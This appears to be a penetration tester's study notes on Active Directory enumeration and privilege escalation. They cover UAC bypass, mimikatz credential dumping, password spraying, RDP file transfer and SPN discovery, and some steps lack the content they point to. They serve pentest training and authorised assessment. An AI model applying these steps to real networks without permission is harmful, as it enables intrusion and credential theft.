Enumeration
Users / Groups / Computers
Look for users with high-privs across the domain e.g. Domain Admins or Derivative Local Admins
Look for custom groups.
If you can't get all the domain members info, you might want to check the priv (whoami /priv)
Check the UAC is enabled (if you're not able to execute executables that you uploaded like mimikatz)
https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/
Plaintext? (low hanging fruit) > Passwordspray?
WinPeas may reveal plaintext pass.
Dumping creds if it's not launghed from a SYSTEM, we need to run
token::elevate after privilege::debuf
Other tools
Are there any pattens in users passwords? Can we make a password list and do a password spray?
Then try RDP
by setting a disk argument, we can see and transfer all the files from the directory as a share. It's super useful.
SPN
Service Principal Names (AD Service Accounts)
A SPN is a unique name for a service on a host, used to associate with an Active Directory service account.
Enum SPNs to obtain the IP address and port number of apps running on servers integrated with Active Directory.
Query the Domain Controller in search of SPNs.
SPN Examples
CIFS/MYCOMPUTER$
- file share access.LDAP/MYCOMPUTER$
- querying AD info via. LDAP.HTTP/MYCOMPUTER$
- Web services such as IIS.MSSQLSvc/MYCOMPUTER$
- MSSQL.
Perform
nslookup
of the service hostname -> see if there is an entrypoint here.Automated SPN enum scripts:
Logged-in users and active user sessions.
More powerview commands https://book.hacktricks.xyz/windows/basic-powershell-for-pentesters/powerview
Domain Controller hostname (PdcRoleOwner)**
Last updated